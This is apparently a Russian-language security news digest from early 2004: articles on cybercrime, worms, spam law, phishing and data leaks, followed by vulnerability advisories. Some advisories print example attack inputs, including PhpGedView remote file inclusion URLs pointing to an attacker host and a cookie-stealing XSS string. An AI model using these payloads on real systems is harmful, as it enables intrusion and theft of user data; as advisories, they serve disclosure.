Организованная киберпреступность и терроризм в Интернете

Центральное внимание ежегодной пресс-конференции «Вирусные итоги» было уделено организованной киберпреступности. Значит ли это, что положение столь опасно? Евгений Касперский утверждал, что да. Вирусные атаки стали более направлены, менее похожи на хулиганство и «пробу пера» начинающих хакеров. До терроризма в Интернете остался один шаг - осознание мощи и ущерба кибератак. Пример эпидемии Slammer показал, что из-за вируса может нарушиться целостность Всемирной сети, отключиться целый национальный сегмент Интернета. А если сделать такое умышленно, чем не террористический акт?

Бизнес из реального мира переходит в мир виртуальный. В сеть вкладываются деньги, что тоже привлекает преступников. За примером далеко ходить не нужно - спам. Очень и очень эффективная реклама, которая требует малых затрат. Мало кто откажется от нее, осознав, насколько она выгодна. Значит, рано или поздно будут появляться структуры, которые ее контролируют. И вирусописатели будут в почетных рядах. Можно вспомнить эпидемию Sobig.f. На пике своей популярности вирус находился в каждом двадцатом письме. В мировых масштабах это огромные цифры. Кто мешает повторить эпидемию уже на благо бизнеса?

Разработчики программного обеспечения быстро реагируют на атаки, но постфактум, а не заранее. Пока не существует средств защиты от глобальных эпидемий вирусов. Значит, важность Интернета для целых государств на сегодняшний день несопоставима с его уязвимостью. Во многих странах мира, включая Россию, разрабатываются проекты закрытых сетей для правительственных нужд. Без выхода в Интернет. Решение ли это? Не лучше ли укрепить безопасность Всемирной сети, начав с самих пользователей? Уникальные коды, личные «права» на пользование решат проблему хотя бы частично.

Объявляется конкурс научных работ по проблемам компьютерной преступности и кибертерроризма

Внимание! Центр исследования компьютерной преступности (г.Запорожье) при поддержке и финансировании Центра по изучению транснациональной преступности и коррупции при Американском университете (г.Вашингтон) объявляют конкурс научных работ «Исследовательские проекты по проблемам компьютерной преступности и кибертерроризма» по программе малых грантов на 2004 год.

Соискателями стипендий на проведение исследований по программе «Исследовательские проекты по проблемам компьютерной преступности и кибертерроризма» могут быть научные работники, практические работники правоохранительных органов, аспиранты, студенты 4-5 курсов высших учебных заведений, имеющие опыт исследовательской и аналитической работы и научный интерес к исследуемой проблеме.

Исследования должны быть посвящены изучению любых аспектов противодействия компьютерной преступности и кибертерроризма в Украине и за рубежом и выполнены в рамках уголовно-правовой, уголовно-процессуальной, криминологической, криминалистической и иных областей научного знания. При прочих равных условиях приоритет будет отдаваться тем исследованиям, которые посвящены выявлению региональной специфики компьютерной преступности и кибертерроризма.

С положением о проведении конкурса малых грантов можно ознакомиться на: http://www.crime-research.ru/contest2004.html

По всем вопросам обращаться: (0612) 62-14-72; 62-90-63 либо ccrc@crime-research.org.

Вирусный хит-парад декабря

"Лаборатория Касперского" представила в начале января рейтинг наиболее распространенных вредоносных программ за декабрь 2003 года. По сравнению с ноябрьской вирусной двадцаткой в списке произошли ряд изменений. Почтовые черви семейства Mimail сохранили сильные позиции и в декабре, однако несомненным лидером хит-парада стал другой известный червь - Swen, выдающий себя за обновление от Microsoft. Доля Swen в общем числе заражений составила 33,87%.

Новогодние черви распространяются через MSN Messenger

Антивирусные эксперты сообщают о появлении нового червя, который распространяется через интернет-пейджер MSN Messenger. Червь Jitux отличается от своих собратьев тем, что ничего не похищает и ничего не предпринимает на инфицированных машинах - только рассылает себя другим адресатам.

В результате эпидемии наиболее пострадали Испания и Мексика. Пик пришелся на первую посленовогоднюю пятницу.

После заражения червь загружает со своего сайта на пораженный компьютер исполняемый файл "jituxramon.exe". После закрепления на "захваченной" машине, червь начинает рассылать свои копии по всем  найденным в контакт-листе MSN Messenger адресатам.

Закон суров - но кого это волнует?

По данным американских интернет-провайдеров, на которых ссылается агентство Reuters, вступление в силу с первого января 2004 года закона о борьбе со спамом, пока никак не отразилось на самочувствии сетевых хомячков, ежедневно заваливающих наши почтовые ящики сотнями рекламных объявлений. Более того, некоторые спаммеры, отличающиеся особо высокой наглостью, даже увеличили объемы своих рассылок. Даже несмотря на то, что в течение Рождественских праздников общий объем электронной почты несколько сократился, доля спама в нем осталась на прежнем уровне и сейчас составляет около 55% всего почтового трафика. Изменился лишь маршрут движения спама: теперь большая часть трафика идет через компьютеры, расположенные в азиатских странах, что, по идее, должно сбить со следа американских полицейских.

Как заявил в интервью агентству известный спаммер Скотт Рихтер, владеющий спаммерской контрой Optinrealbig.com, ежедневно рассылающей несколько сот миллионов рекламных объявлений, его портфель заказов стремительно растет, а «бизнес процветает». Все, что потребовалось предпринять Рихтеру для того, чтобы не попасть под суровую длань закона, это добавить в конец каждого письма свой адрес и указать, что данное письмо – таки действительно рекламное объявление, а не открытка от Деда Мороза.

По мнению некоторых экспертов, закон о борьбе со спамом не будет работать до тех пор, пока в нем не будет четко прописана правоприменительная процедура, действительно позволяющая применять жесткие меры против особо злостных нарушителей, сообщает Internet.ru.

ООН учредит рабочую группу по управлению Интернетом

В продолжение успешно проведенного саммита в Женеве по информационному сообществу, ООН вскоре учредит рабочую группу по управлению Интернетом. Рабочая группа будет открытой и все ее действия будут доступны для обозрения. Этим самым будет гарантирована возможность всем заинтересованным сторонам участвовать в процессе выработки механизмов управления Интернетом к 2005 г. Во время саммита депутаты некоторых стран инициировали создание подобной группы для согласования всех механизмов, по которым государства и частный сектор будут играть роль в развитии Сети.

Электронные письма от ФБР таят опасность

Вирусописатели ловят музыкальных фанатов на страхе быть замешенным в судебное дело о незаконном распространении файлов.

Пользователям приходит якобы предупреждение от Федерального бюро расследований с сообщением о том, что они находятся под следствием. Сообщается, что в приложении содержатся доказательства их вины.

Однако на самом деле - это всего лишь блестящий социальный инжиниринг конструкторов вирусов. В приаттаченном файле к липовому уведомлению находится злонамеренное программное обеспечение (malware).

Несмотря на то, что письмо от ФБР выглядит подлинным, при более внимательном рассмотрении можно обнаружить фактические и орфографические ошибки, которые сводят игру вирусописателей на нет. Тем не менее, на данную электронную уловку попался не один десяток пользователей. Это ярко демонстрирует, как содержание сообщения может вводить людей в заблуждение, - сообщает The Register.

Владельцы Visa пали жертвой нового жульничества

Мошенники разослали письма с поддельным обратным адресом, исходящие как будто бы от сайта visa.com. В посланиях пользователей уведомляли, что Visa разработала новую систему защиты, и просили перейти по ссылке для ознакомления. Ссылка на первый взгляд тоже вела на сайт visa.com, но на самом деле переход осуществлялся на сервер мошенников. Такое стало возможным из-за недавно обнаруженной уязвимости в Internet Explorer, патчи от которой многие пользователи еще просто не установили.

Ныне мошеннический сайт-ловушка закрыт, но многие владельцы кредиток Visa уже попались на уловки преступников.

На выходные и праздники количество подобных мошеннических посланий как правило резко возрастает, причем процент "срабатываний" таких ловушек сам по себе довольно высок - 5% от общего количества получивших послания.

Украинские хакеры атаковали Royal Bank of Scotland

Компьютерная система платежей одного из крупнейших британских банков - Шотландского королевского банка (Royal Bank of Scotland) подверглась нападению со стороны украинских хакеров. В результате атаки система выведена из строя, сообщает британська газета «Файненшл таймс».

При помощи этой системы британский банк обслуживал в режиме он-лайн платежи 27 тысяч компаний розничной торговли во всем мире, среди которых такие известные, как Sony Music, Vodafone и Freeserve. Система вышла из строя от перегрузки серверов, которые просто забрасывало фальшивыми запросами с компьютеров, которые находятся в Украине.

Специалисты не видят причины для нападения на компьютерную систему британского банка, поэтому действия украинских хакеров считают немотивированными. О вреде от атаки украинских хакеров банк не сообщает. Все клиенты получили заверение, что хакеры не могли получить доступ к информации о них в базе данных.

Royal Bank of Scotland принимает меры, чтобы возобновить свою компьютерную систему розничных платежей. Расследованием этого преступления занимается Национальный центр по борьбе с преступностью в сфере высоких технологий (NHTCU).

Информацию о москвичах защитят от хакеров

Накануне Нового года Юрий Лужков подписал распоряжение "О мерах по предотвращению распространения конфиденциальной информации о гражданах". С 1 января нового года за каждую проданную на Митинском радио рынке базу данных будет отвечать конкретный столичный чиновник. 

Сейчас электронные базы данных, содержащие полную информацию о всех жителях Москвы, можно купить на каждом углу. Базы ГИБДД, ЖКХ, адресные программы и даже списки сотрудников ГУВД стоят от 50 до 250 долларов. За 500 долларов на Митинском радио рынке продают диски, содержащие полную информацию о любом человеке. Ежедневно на электронные адреса приходят десятки спам-сообщений, предлагающих купить ту или иную базу. 

- Поймать за руку чиновника, торгующего такими базами, или хакера, взламывающего государственные сети, практически невозможно, - рассказали "Известиям" в управлении "К" (киберполиция ) по Москве. Продавцы отделываются небольшими штрафами и уже через несколько дней опять торгуют такими же дисками на улице. 

С 1 января 2004 года Управлению информатизации города Москвы в рамках городской целевой программы "Электронная Москва" поручено строго блюсти конфиденциальность информации гражданах, содержащейся в базах данных городских организаций, а ГУВД Москвы "обеспечить выявление и расследование случаев "утечки" и незаконного использования информации о гражданах". 

- Еще в начале этого года Владимир Путин подписал доктрину информационной безопасности страны, - рассказал "Известиям" главный конструктор по информационной безопасности ГЦП "Электронная Москва" Игорь Дмитриев. - Москва первый город, который начал воплощать эту доктрину в жизнь. 

Прежде всего, теперь, вступая в любые финансовые или юридические отношения с городом, каждый человек будет подписывать специальный договор, в котором будет четко прописано, кто и при каких условиях сможет воспользоваться полученной от него информацией. В каждом округе выделят специального чиновника, отвечающего за сбор всех электронных данных с населения. Доступ к компьютерным базам будет иметь только он. Поэтому, в случае "утечки" информации власти смогут сразу найти виновного. 

- Специальная шифровка данных, цифровая подпись и аттестация всех технических средств и людей, имеющих доступ к базам данных, позволят легко вычислить чиновника, продающего секреты москвичей, - пояснил "Известиям" Игорь Дмитриев. - Кроме того, мы планируем создать свой базовый уровень информационной безопасности, который будет рекомендован всем коммерческим структурам, взаимодействующим с городскими властями. В будущем, предприятия, не имеющие уровня информационной безопасности, соответствующего нашим стандартам, к работе с городом допускаться не будут. 

Но независимые эксперты в столь быстрое решение проблемы информационной безопасности не верят. 

- Прежде всего, нельзя скидывать со счетов человеческий фактор. Нечестный чиновник всегда найдет способ обмануть компьютер, - считает сотрудник антивирусной академии "Касперского" Алексей Зернов. -Если говорить о техническом аспекте проблемы, то создание защиты в локальных сетях полной победы над компьютерной преступностью не принесет. Введение авторизации пользователя, установка систем защиты и присвоение персонального номера решит проблему только на местах. Пока в российском сегменте глобальной сети "интернет" присутствует анонимность пользователя, любой хакер сможет проникнуть в городскую систему и украсть нужную ему базу данных, оставшись при этом незамеченным.

SQL инъекция в PostCalendar

Программа: PostCalendar 4.0.0 Опасность: Высокая Наличие эксплоита: Нет Описание: Несколько уязвимостей в проверке правильности входных данных обнаружено в PostCalendar. Удаленный пользователь может внедрить SQL команды, которые будут выполнены на основной базе данных. Уязвимость обнаружена в функции поиска. Дополнительные подробности не раскрываются. URL производителя: http://noc.postnuke.com/projects/postcalendar Решение: Установите обновленную версию программы (4.0.1): http://noc.postnuke.com/download.php/243/postcalendar-4.0.1.zip

PostCalendar Security Advisory PCSA 2004-1

Небезопасные разрешения в Lotus Notes Domino на Linux системах

Программа: Lotus Notes Domino 6.0.2 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость конфигурации обнаружена в Lotus Notes Domino на Linux системах. Локальный пользователь может модифицировать критические файлы конфигурации. Конфигурационные файлы '/local/notesdata/notes.ini' и '/opt/lotus/LPSilent.ini' устанавливаются с небезопасными разрешениями. Локальный пользователь может модифицировать notes.ini файл, добавляя, удаляя или модифицируя ключи. Например, локальный пользователь может изменить параметр 'CleanupScriptPath', что бы он ссылался на злонамеренный файл, который будет выполнен с поднятыми привилегиями. URL производителя: http://www.ibm.com Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Lotus Notes Domino 6.0.2 (linux) faulty default permissions

Удаленный отказ в обслуживании против jabberd

Программа: jabberd 1.4.3

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Отказ в обслуживании обнаружен в jabberd. Удаленный пользователь может аварийно завершить работу jabberd службы.

Программное обеспечение не в состоянии правильно обработать SSL подключения, когда не используются не блокированные сокеты. Недостаток обнаружен в 'mio_ssl.c'.

URL производителя:http://jabberd.jabberstudio.org/

Решение:Установите обнвленную версию программы: http://jabberd.jabberstudio.org/1.4/dist/jabberd-1.4.3.tar.gz

Доступ к базе данных в PortalApp

Программа: PortalApp Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость в управлении доступом обнаружена в PortalApp. Удаленный пользователь может получить доступ к основной базе данных. Удаленный пользователь может получить доступ к основной базе данных, используя URL следующего типа: http://[target]/[portal directory]/data/8275.mdb URL производителя: http://www.aspapp.com/apps/products.asp?catid=66&prodid=portalapp Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

PortalApp

Несколько уязвимостей в PostNuke

Программа: PostNuke 0.726 Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость обнаружена в PostNuke. Удаленный пользователь может внедрить произвольные SQL команды. Удаленный пользователь может выполнить XSS нападение. Программное обеспечение не фильтрует 'sortby' переменную в 'members_list' модуле. В результате удаленный пользователь может внедрить произвольные SQL команды. Также сообщается, что модуль загрузки не фильтрует HMTL код из данных, представленных Пользователем в 'ttitle' переменной. Пример/Эксплоит: name=Downloads&file=index&req=viewdownloaddetails&lid=[VID]&ttitle="><i frame> URL производителя: http://lists.postnuke.com/pipermail/postnuke-security/2004q1/000001.html Решение: Установите соответствующее обновление: 1. PostNuke Phoenix 0.726-1 (.tar.gz format) http://download.postnuke.com/pafiledb.php?action=file&id=34 Size/MD5 checksum: b56a5be2e88e5d6ad779a47bb4864084 2. PostNuke Phoenix 0.726-1 (.zip format) http://download.postnuke.com/pafiledb.php?action=file&id=33 Size/MD5 checksum: 4b5fd57053c8577eeefef50cd1d19279 3. Members_List patch for pn0.726 (.tar.gz format) http://download.postnuke.com/pafiledb.php?action=file&id= 42 Size/MD5 checksum: 6cf971d9222821529cbf7029dcd97dcc 4. Members_List patch for pn0.726 (.zip format) http://download.postnuke.com/pafiledb.php?action=file&i d=41 Size/MD5 checksum: d36e5b9442a688e8348cf67a1ef21f56

PostNuke Issues (0.726 && Possibly Older)

Несколько уязвимостей в PhpGedView

Программа: PhpGedView 2.61 Опасность: Высокая Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в PhpGedView. Удаленный пользователь может выполнить произвольный PHP код команды операционной системы на целевой системе. Удаленный атакующий может выполнить XSS нападение. Несколько сценариев ('functions.php', 'authentication_index.php', и 'config_gedcom.php') не проверяют переменную "$PGV_BASE_DIRECTORY" перед включением файла. Пример: http://[target]/phpgedview_folder/authenti cation_index.php?PGV_BASE_DIRECTORY=http://[attacker]/ http://[target]/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://[attacker]/ http://[target]/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://[attacker]/ Также сообщается, что файл 'editconfig.php' может использоваться удаленным пользователем для переустановки программного обеспечения и изменения пароля администратора: http://[target]/phpgedview_folder/editconfig.php Также сообщается, что файл 'search.php' не фильтрует HTML код в данных, представленных пользователем в 'firstname' переменной. Пример: http://localhost/phpgedview/search.php?action=soundex&firstname="><script >alert(document.cookie)</script> Также сообщается, что удаленный пользователь может определить информацию о конфигурации PHP на целевой системе, используя следующий URL: http://[target]/phpgedview_folder/admin.php?action=phpinfo URL производителя: http://phpgedview.sourceforge.net/ Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальное исправление см. в источнике сообщения.

Vuln in PHPGEDVIEW 2.61 Multi-Problem